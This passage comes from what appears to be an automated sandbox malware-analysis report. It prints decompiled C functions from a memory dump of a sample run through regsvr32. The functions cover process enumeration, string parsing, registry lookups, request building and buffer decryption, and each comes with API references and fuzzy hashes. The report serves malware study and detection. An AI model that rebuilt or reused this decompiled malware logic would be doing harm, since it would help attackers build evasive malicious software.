				_t12 = E00F43727(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xf4c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xf4c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00f49a5f
0x00f49a63
0x00f49a65
0x00f49a66
0x00f49a6e
0x00f49a6e
0x00f49a72
0x00000000
0x00000000
0x00f49a69
0x00f49a6a
0x00f49a6d
0x00f49a6d
0x00f49a7a
0x00f49a81
0x00f49a85
0x00f49a8d
0x00f49a93
0x00f49a95
0x00f49a9a
0x00f49a9e
0x00f49aa0
0x00f49aa3
0x00f49aaa
0x00f49aaa
0x00f49ab4
0x00f49ab7
0x00f49aba
0x00f49aba
0x00f49ac6
0x00f49ac6
0x00f49ad3

APIs

StrChrA.SHLWAPI(?,00000020,00000000,057395AC,?,00F459CF,?,00F44106,057395AC,?,00F459CF), ref: 00F49A6E
StrTrimA.KERNELBASE(?,00F4C2A4,00000002,?,00F459CF,?,00F44106,057395AC,?,00F459CF), ref: 00F49A8D
StrChrA.SHLWAPI(?,00000020,?,00F459CF,?,00F44106,057395AC,?,00F459CF), ref: 00F49A98
StrTrimA.SHLWAPI(00000001,00F4C2A4,?,00F459CF,?,00F44106,057395AC,?,00F459CF), ref: 00F49AAA

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 60dfb745337a7cfb6a37cfc80ad536d905cc0a8fc1d6187c1c237b8ca3601ea0
Instruction ID: cdaa8f9de8020d927b2e9613e74cf574d02d7ad6fd6afc42a88cfeca72bd4026
Opcode Fuzzy Hash: 60dfb745337a7cfb6a37cfc80ad536d905cc0a8fc1d6187c1c237b8ca3601ea0
Instruction Fuzzy Hash: A701B572B093256FD3219F658C49B2BBF9CEB96BA0F111519FD81C7241DAE4CC01A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F49E28, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00F49E28() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xf4d27c; // 0x47ea5a8
						_t2 = _t9 + 0xf4ee54; // 0x73617661
						_push( &_v264);
						if( *0xf4d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00f49e33
0x00f49e38
0x00f49e3d
0x00f49e41
0x00f49e4b
0x00f49e7c
0x00f49e52
0x00f49e57
0x00f49e64
0x00f49e6d
0x00f49e84
0x00f49e6f
0x00f49e77
0x00000000
0x00f49e77
0x00f49e85
0x00f49e86
0x00000000
0x00f49e86
0x00000000
0x00f49e80
0x00f49e8c
0x00f49e91

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F49E38
Process32First.KERNEL32(00000000,?), ref: 00F49E4B
Process32Next.KERNEL32(00000000,?), ref: 00F49E77
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F49E86

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 313acf0fefc79203602dfb1de087f2cf7efde127b7ea8a5e442f67d1cba2ab6d
Instruction ID: 6a0b13a6d9f280ea64d9a8bf099b990aea37b92d3b29211aedb2d5935529c980
Opcode Fuzzy Hash: 313acf0fefc79203602dfb1de087f2cf7efde127b7ea8a5e442f67d1cba2ab6d
Instruction Fuzzy Hash: C1F0BB36605028A7DB20E7B69C49EEB7FACDBC5760F000061FD16C3101FAA4CE4976B5

Uniqueness

Uniqueness Score: -1.00%

Function 00F43B20, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F43B20(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00F4473F(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xf4d27c; // 0x47ea5a8
				_t4 = _t24 + 0xf4ede0; // 0x5739388
				_t5 = _t24 + 0xf4ed88; // 0x4f0053
				_t26 = E00F4A3A7( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xf4d27c; // 0x47ea5a8
						_t11 = _t32 + 0xf4edd4; // 0x573937c
						_t48 = _t11;
						_t12 = _t32 + 0xf4ed88; // 0x4f0053
						_t55 = E00F4737F(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0xf4d27c; // 0x47ea5a8
							_t13 = _t35 + 0xf4ee1e; // 0x30314549
							if(E00F4728F(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0xf4d25c - 6;
								if( *0xf4d25c <= 6) {
									_t42 =  *0xf4d27c; // 0x47ea5a8
									_t15 = _t42 + 0xf4ec2a; // 0x52384549
									E00F4728F(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0xf4d27c; // 0x47ea5a8
							_t17 = _t38 + 0xf4ee18; // 0x57393c0
							_t18 = _t38 + 0xf4edf0; // 0x680043
							_t40 = E00F470E0(_v8, 0x80000001, _t55, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xf4d238, 0, _t55);
						}
					}
					HeapFree( *0xf4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00F4A50C(_t54);
				}
				return _t45;
			}

0x00f43b20
0x00f43b30
0x00f43b33
0x00f43b3a
0x00f43b3c
0x00f43b3c
0x00f43b3f
0x00f43b44
0x00f43b4b
0x00f43b58
0x00f43b5d
0x00f43b61
0x00f43b6f
0x00f43b7d
0x00f43b81
0x00f43c12
0x00f43c12
0x00f43b87
0x00f43b87
0x00f43b8c
0x00f43b8c
0x00f43b93
0x00f43b9f
0x00f43ba1
0x00f43ba3
0x00f43ba5
0x00f43bac
0x00f43bbe
0x00f43bc0
0x00f43bc7
0x00f43bc9
0x00f43bd0
0x00f43bdb
0x00f43bdb
0x00f43bc7
0x00f43be0
0x00f43be5
0x00f43bec
0x00f43bfc
0x00f43c0a
0x00f43c0c
0x00f43c0c
0x00f43ba3
0x00f43c1e
0x00f43c1e
0x00f43c20
0x00f43c25
0x00f43c27
0x00f43c27
0x00f43c32

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05739388,00000000,?,73BCF710,00000000,73BCF730), ref: 00F43B6F
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,057393C0,?,00000000,30314549,00000014,004F0053,0573937C), ref: 00F43C0C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F49F20), ref: 00F43C1E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c293aef5465d33f80c43b2a11057c0c1b37e17cb6efe100ca84158f192295c44
Instruction ID: 5624750d1fad3f2f74eaaae831fbe802a404e84588447fbb0b112d0a7a0e5bc6
Opcode Fuzzy Hash: c293aef5465d33f80c43b2a11057c0c1b37e17cb6efe100ca84158f192295c44
Instruction Fuzzy Hash: 55319C76901118AFDB20EBA4DC85EAABBBCEB55350F1500A5FE00A7121E7B09B44FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F44BEF, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F44BEF(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t37 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xf4d340; // 0x5739988
				_push(0x800);
				_push(0);
				_push( *0xf4d238);
				if( *0xf4d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xf4d24c =  *0xf4d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00F4168D(_t44, _t40); // executed
						_t18 = E00F46F0D(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xf4d24c < 5) {
								 *0xf4d24c =  *0xf4d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00F448E8();
						RtlFreeHeap( *0xf4d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E00F496CE(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E00F411FA(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x00f44bef
0x00f44bef
0x00f44bf2
0x00f44bf3
0x00f44bfd
0x00f44c04
0x00f44c09
0x00f44c0b
0x00f44c11
0x00f44c39
0x00f44c51
0x00f44c53
0x00f44c54
0x00f44c56
0x00f44c94
0x00f44c94
0x00f44c9a
0x00f44ca0
0x00f44ca0
0x00f44c58
0x00f44c5e
0x00f44c61
0x00f44c70
0x00f44c72
0x00f44c79
0x00f44cad
0x00f44cb2
0x00f44cb4
0x00f44cb6
0x00f44cb6
0x00000000
0x00f44cb4
0x00f44c7b
0x00f44c80
0x00f44c8e
0x00000000
0x00f44c8e
0x00f44c48
0x00f44c4d
0x00f44c4d
0x00000000
0x00f44c4d
0x00f44c13
0x00f44c1b
0x00000000
0x00000000
0x00f44c2a
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 00F44C13

Part of subcall function 00F411FA: GetTickCount.KERNEL32 ref: 00F4120E
Part of subcall function 00F411FA: wsprintfA.USER32 ref: 00F4125E
Part of subcall function 00F411FA: wsprintfA.USER32 ref: 00F4127B
Part of subcall function 00F411FA: wsprintfA.USER32 ref: 00F412A7
Part of subcall function 00F411FA: HeapFree.KERNEL32(00000000,?), ref: 00F412B9
Part of subcall function 00F411FA: wsprintfA.USER32 ref: 00F412DA
Part of subcall function 00F411FA: HeapFree.KERNEL32(00000000,?), ref: 00F412EA
Part of subcall function 00F411FA: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F41318
Part of subcall function 00F411FA: GetTickCount.KERNEL32 ref: 00F41329

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 00F44C31
RtlFreeHeap.NTDLL(00000000,00000002,00F49F6B,?,00F49F6B,00000002,?,?,00F45A08,?), ref: 00F44C8E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: e0d192b298ad6be4baaf249662e8008ae45e8e2f7b54f4963ab7256e7a76d250
Instruction ID: 6fc7631d7ae7ea6f9e2a4b296dca659d0bc4fae23e8451045969a0c0e8aed45f
Opcode Fuzzy Hash: e0d192b298ad6be4baaf249662e8008ae45e8e2f7b54f4963ab7256e7a76d250
Instruction Fuzzy Hash: A121807A602208EBDB119F58DC85F9A3BACEB59315F140126FE01E7150DBB4E944FBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F48930, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F48930(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0xf4d238, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00F4A880(_t57 - _a4, _a4, _t48);
							_t38 = E00F4A880(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00F4A880(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x00f48938
0x00f4893d
0x00f4893f
0x00f48946
0x00f48958
0x00f48958
0x00f4895c
0x00f4895e
0x00f48961
0x00f48964
0x00f4896d
0x00f48977
0x00f4897b
0x00f48980
0x00f48990
0x00f48996
0x00f4899a
0x00f489e9
0x00f4899c
0x00f4899c
0x00f489a5
0x00f489b4
0x00f489b9
0x00f489c6
0x00f489cf
0x00f489da
0x00f489e1
0x00f489e5
0x00f489e5
0x00f4899a
0x00f489f0
0x00f489f7

APIs

lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00F48964
StrStrA.SHLWAPI(00000000,?), ref: 00F48971
RtlAllocateHeap.NTDLL(00000000,?), ref: 00F48990

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: 2b5f436f2c83c5c3bb372fc4c8422e001b15bd4923c077128143b3c5428e090e
Instruction ID: 5b1cc9923b91d70fade804449b8135a420ae71adfe3d0aea51a7dfa42e81bcaa
Opcode Fuzzy Hash: 2b5f436f2c83c5c3bb372fc4c8422e001b15bd4923c077128143b3c5428e090e
Instruction Fuzzy Hash: 4E215A36A00109AFCB129F68C884BAEBFB9EF85350F048255EC04AB315DB34D916DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00F43D90, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00F43D90(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E00F4A552(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0xf4d27c; // 0x47ea5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0xf4e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0xf4e90c; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E00F480DF();
					_push( &_v64);
					if( *0xf4d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E00F480DF();
				}
				return _t28;
			}

0x00f43d90
0x00f43d97
0x00f43da0
0x00f43da5
0x00f43da9
0x00f43db3
0x00f43db8
0x00f43dbd
0x00f43dc5
0x00f43dcc
0x00f43dd6
0x00f43dd6
0x00f43dce
0x00f43dce
0x00f43dce
0x00f43dce
0x00f43ddc
0x00f43de2
0x00f43de3
0x00f43de6
0x00f43de9
0x00f43dec
0x00f43df4
0x00f43dfd
0x00f43e05
0x00f43e05
0x00f43e07
0x00f43e09
0x00f43e09
0x00f43e13

APIs

Part of subcall function 00F4A552: SysAllocString.OLEAUT32(00000000), ref: 00F4A5AE
Part of subcall function 00F4A552: SysAllocString.OLEAUT32(0070006F), ref: 00F4A5C2
Part of subcall function 00F4A552: SysAllocString.OLEAUT32(00000000), ref: 00F4A5D4
Part of subcall function 00F4A552: SysFreeString.OLEAUT32(00000000), ref: 00F4A638

memset.NTDLL ref: 00F43DB3
GetLastError.KERNEL32 ref: 00F43DFF

Strings

<, xrefs: 00F43DC5

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$Alloc$ErrorFreeLastmemset
String ID: <
API String ID: 1330562889-4251816714
Opcode ID: ad4ea78a93e05c02c4107a12b5e924d0e91a93fd1cfea1041573aaf9ce832f28
Instruction ID: ad09c74e41373cdc0225f58eb230a66ce225c2e79d8a3528028b0a95e5a3efa7
Opcode Fuzzy Hash: ad4ea78a93e05c02c4107a12b5e924d0e91a93fd1cfea1041573aaf9ce832f28
Instruction Fuzzy Hash: 31016D31D0121CABDB10EFA8DC85EDEBFB8AB08790F044122FD04E7111E774DA04ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F449F5, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00F449F5(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xf4d27c; // 0x47ea5a8
				_t5 = _t40 + 0xf4ee40; // 0x410025
				_t85 = E00F41649(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E00F46EF8(_v16);
					goto L24;
				}
				if(E00F4473F(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E00F44FD8(0,  *0xf4d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0xf4d27c; // 0x47ea5a8
					_t11 = _t52 + 0xf4e81a; // 0x65696c43
					_t55 = E00F44FD8(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E00F482C4(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E00F46EF8(_t87);
					}
					if(_t80 != 0) {
						L17:
						E00F46EF8(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E00F4A50C(_t86);
						}
						goto L22;
					} else {
						if(( *0xf4d260 & 0x00000001) == 0) {
							L14:
							E00F45AB6(_v84, _v88, _v88,  *0xf4d270, 0);
							_t80 = E00F4428C(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E00F47BD6( &_v40, 0);
							}
							E00F46EF8(_v88);
							goto L17;
						}
						_t67 =  *0xf4d27c; // 0x47ea5a8
						_t18 = _t67 + 0xf4e823; // 0x65696c43
						_t70 = E00F44FD8(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E00F482C4(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E00F46EF8(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x00f44a07
0x00f44a0a
0x00f44a11
0x00f44a17
0x00f44a18
0x00f44a19
0x00f44a1a
0x00f44a1b
0x00f44a1c
0x00f44a24
0x00f44a30
0x00f44a34
0x00f44a37
0x00f44b86
0x00f44b89
0x00f44b8d
0x00f44b8d
0x00f44a49
0x00f44a51
0x00f44b79
0x00f44b7a
0x00f44b7d
0x00000000
0x00f44b7d
0x00f44a63
0x00f44a65
0x00f44a65
0x00f44a70
0x00f44a77
0x00f44a7a
0x00f44b68
0x00000000
0x00f44a80
0x00f44a80
0x00f44a85
0x00f44a8e
0x00f44a93
0x00f44a9c
0x00f44abf
0x00f44a9e
0x00f44ab4
0x00f44ab6
0x00f44ab6
0x00f44ac2
0x00f44b5c
0x00f44b5f
0x00f44b69
0x00f44b69
0x00f44b6e
0x00f44b70
0x00f44b70
0x00000000
0x00f44ac8
0x00f44acf
0x00f44b10
0x00f44b20
0x00f44b36
0x00f44b3a
0x00f44b3f
0x00f44b45
0x00f44b52
0x00f44b52
0x00f44b57
0x00000000
0x00f44b57
0x00f44ad1
0x00f44ad6
0x00f44adf
0x00f44ae4
0x00f44ae8
0x00f44b0b
0x00f44aea
0x00f44b00
0x00f44b02
0x00f44b02
0x00f44b0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00f44b0e
0x00f44ac2

APIs

memset.NTDLL ref: 00F44A0A

Part of subcall function 00F41649: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00F44A30,00410025,00000005,?,00000000), ref: 00F4165A
Part of subcall function 00F41649: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00F41677

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00F44A3E
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00F44A49

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: bf508fa65075f33c33085cfdd8b570d31435363468e13949cb30ccb96f61aead
Instruction ID: bf8c493f73ad97daa50bfd40c7eb36e717eb5803019b2464cc7314c54c302982
Opcode Fuzzy Hash: bf508fa65075f33c33085cfdd8b570d31435363468e13949cb30ccb96f61aead
Instruction Fuzzy Hash: 9B414F76A00218ABDB11EFE4CC85FAE7FBCEB49354B144125FD01E7111E674EA44A791

Uniqueness

Uniqueness Score: -1.00%

Function 00F4813D, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4813D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E00F43727(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xf4d2d4, 0x90);
					_t27 =  *0xf4d2d8; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00F45AB6(0x90, _a4, _a4, _t27, 0);
					}
					if(E00F493F3( &_v36) != 0 && E00F451AA(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E00F4924D(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875fc
						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
						_t57 = _t57 + 0xc;
						E00F46EF8(_t55);
					}
					memset(_a4, 0, _t53);
					E00F46EF8(_a4);
				}
				return _v16;
			}

0x00f48143
0x00f48148
0x00f48155
0x00f48158
0x00f4815b
0x00f48162
0x00f48165
0x00f48173
0x00f48178
0x00f4817d
0x00f48182
0x00f48184
0x00f4818d
0x00f4818d
0x00f4819c
0x00f481bf
0x00f481c5
0x00f481cb
0x00f481d3
0x00f481d9
0x00f481dc
0x00f481e9
0x00f481ee
0x00f481f2
0x00f481f2
0x00f481fd
0x00f48208
0x00f48208
0x00f48214

APIs

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

memcpy.NTDLL(00000000,00000090,00000002,00000002,00F49F6B,00000008,00F49F6B,00F49F6B,?,00F44C77,00F49F6B), ref: 00F48173
memset.NTDLL ref: 00F481E9
memset.NTDLL ref: 00F481FD

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

